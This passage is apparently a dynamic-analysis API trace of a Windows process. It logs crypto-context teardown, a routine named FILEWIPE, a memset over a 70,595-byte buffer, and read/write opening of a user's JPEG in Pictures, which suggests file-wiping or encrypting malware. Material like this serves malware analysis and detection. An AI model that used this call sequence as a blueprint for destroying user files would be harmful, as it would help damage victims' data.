lpMsg=0x87f04c) returned 0 [0188.805] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0188.805] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0188.805] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.805] CryptDestroyKey (hKey=0x90af18) returned 1 [0188.806] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0188.806] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0188.806] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0188.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0188.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.806] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0188.806] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0188.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.806] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0188.806] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0188.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0188.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0188.806] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0188.806] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0188.806] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0188.806] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0188.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0188.806] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0188.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0188.807] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0188.807] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0188.807] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.807] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0188.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0188.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.807] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.807] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0188.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.807] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.807] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0188.807] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.807] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.807] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0188.807] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.808] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.808] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0188.808] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0188.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0188.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.808] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0188.808] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.808] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0188.808] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.808] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.808] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0188.808] FreeLibrary (hLibModule=0x74f20000) returned 1 [0188.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0188.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0188.808] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0188.808] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0188.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0188.809] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.809] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.809] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.810] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.810] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0188.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0188.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0188.810] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.810] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.810] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe325e90, ftCreationTime.dwHighDateTime=0x1d5d907, ftLastAccessTime.dwLowDateTime=0x67965860, ftLastAccessTime.dwHighDateTime=0x1d5e2b2, ftLastWriteTime.dwLowDateTime=0x67965860, ftLastWriteTime.dwHighDateTime=0x1d5e2b2, nFileSizeHigh=0x0, nFileSizeLow=0x113c3, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="3TvBEt HM8KLbxN.jpg", cAlternateFileName="3TVBET~1.JPG")) returned 0x90af58 [0188.810] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0188.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0188.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0188.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0188.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.811] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.811] CharLowerBuffW (in: lpsz="byte[70595]", cchLength=0xb | out: lpsz="byte[70595]") returned 0xb [0188.811] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.811] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0188.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0188.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0188.811] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.811] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0188.811] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0188.811] FreeLibrary (hLibModule=0x75c90000) returned 1 [0188.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0188.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0188.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0188.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0188.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0188.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0188.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0188.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0188.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0188.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0188.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0188.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0188.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0188.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0188.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0188.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0188.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0188.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0188.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0188.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0188.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0188.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0188.812] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0188.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0188.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0188.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0188.813] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.813] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.813] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.813] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0188.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0188.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0188.813] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.813] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.813] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.813] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.813] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.813] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.813] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.813] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.815] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.815] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.815] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0188.815] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.816] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.816] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.816] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.816] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.816] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0188.816] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.816] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\3tvbet hm8klbxn.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0188.816] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0188.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0188.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0188.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0188.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0188.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0188.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0188.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0188.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0188.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0188.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0188.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0188.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0188.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0188.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0188.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0188.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0188.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0188.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0188.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0188.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0188.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0188.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0188.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0188.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0188.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0188.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0188.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0188.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0188.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0188.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0188.818] HeapFree 